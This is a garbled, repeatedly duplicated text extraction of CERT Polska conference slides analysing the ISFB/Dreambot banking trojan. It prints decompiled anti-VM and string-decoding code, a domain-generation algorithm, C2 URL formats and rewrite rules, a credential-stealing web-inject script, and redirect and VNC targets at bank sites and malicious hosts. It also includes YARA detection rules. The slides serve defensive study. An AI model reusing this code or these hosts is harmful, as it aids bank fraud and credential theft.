DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 758
Scale
(n6 sinkhole connections in october - bankers only)
758
02122016 ISFB
httpslokalhostpltalksbotconf20161 858
Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]
858
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 858
Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]
858
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
